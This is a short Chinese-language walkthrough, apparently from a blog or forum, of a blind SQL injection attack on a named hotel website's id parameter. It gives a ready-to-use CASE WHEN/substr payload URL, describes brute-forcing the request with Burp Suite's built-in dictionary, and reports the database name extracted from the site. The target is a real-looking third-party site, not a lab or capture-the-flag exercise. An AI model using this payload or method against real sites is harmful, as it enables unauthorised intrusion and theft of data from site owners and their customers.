建议浏览器:火狐firefox
建议下载插件:hackbar(打开后按f12使用)
点开以后输入Payload:
https://www.hotelmodena.sk/index.php?id=1/case when substr(database(),1,1)='a' then 1 else 0 end&lang=sk
EXECUTE以后抓包并且发送到爆破模块:
添加payload字典,使用Bp自带字典:
开始攻击,攻击成功,length排序后得到数据库名:hp7gx988